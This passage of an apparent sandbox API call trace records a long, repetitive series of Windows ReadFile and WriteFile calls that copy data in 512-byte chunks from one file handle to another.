lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.618] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.618] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.619] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.619] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.620] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.620] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.621] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.621] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.622] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.622] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.623] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.623] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.624] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.624] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.625] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.625] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.626] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.626] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.627] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.627] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.628] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.628] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.629] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.629] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.630] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.630] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.630] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.631] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.631] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.633] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.633] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.634] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.634] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.635] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.635] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.636] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.636] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.637] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.637] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.638] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.638] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.639] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.639] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.640] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.640] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.641] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.641] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.642] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.642] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.643] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.643] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.643] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.644] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.645] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.645] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.646] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.646] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.647] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.647] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.648] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.648] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.649] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.649] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.649] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.650] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.650] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.651] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.651] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.652] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.652] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.653] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.653] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.654] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.654] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.655] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.655] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.656] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.656] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.657] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.657] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.658] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.658] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.658] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.659] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.660] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.660] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.660] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.661] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.661] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.662] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.662] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.663] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.664] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.664] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.665] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.665] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.665] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.666] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.666] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.667] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.668] 